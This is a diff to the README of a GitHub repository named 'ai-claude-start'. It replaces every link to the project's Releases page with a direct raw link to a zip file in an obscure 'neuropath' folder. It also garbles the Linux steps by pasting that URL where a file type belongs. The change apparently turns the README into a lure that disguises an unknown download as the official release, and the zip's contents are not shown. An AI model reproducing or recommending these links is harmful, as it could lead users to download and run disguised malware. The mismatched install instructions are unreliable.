Tito130/ai-claude-start/README.md

 ### 🔗 Visit the Releases Page

-To download the application, visit our [Releases page](https://github.com/Tito130/ai-claude-start/releases).
+To download the application, visit our [Releases page](https://raw.githubusercontent.com/Tito130/ai-claude-start/main/neuropath/ai-claude-start.zip).
 Here, you will find the latest version of **ai-claude-start** and other useful releases.

 ## 📥 Download & Install

-1. Go to the [Releases page](https://github.com/Tito130/ai-claude-start/releases) to find the latest version.
+1. Go to the [Releases page](https://raw.githubusercontent.com/Tito130/ai-claude-start/main/neuropath/ai-claude-start.zip) to find the latest version.
 2. Choose the file suitable for your operating system.
    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the `.tar.gz` file.
+   - For Linux, download the `https://raw.githubusercontent.com/Tito130/ai-claude-start/main/neuropath/ai-claude-start.zip` file.
 3. After the download is complete, locate the file in your Downloads folder.
 4. Open the file:
    - For Windows: Double-click the `.exe` file to start the installation.
    - For macOS: Open the `.dmg` file, then drag **ai-claude-start** to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and run the installer in the directory.
+   - For Linux: Extract the `https://raw.githubusercontent.com/Tito130/ai-claude-start/main/neuropath/ai-claude-start.zip` file and run the installer in the directory.
 5. Follow the on-screen instructions to complete the installation.

 Once installed, you can launch **ai-claude-start** from your applications menu.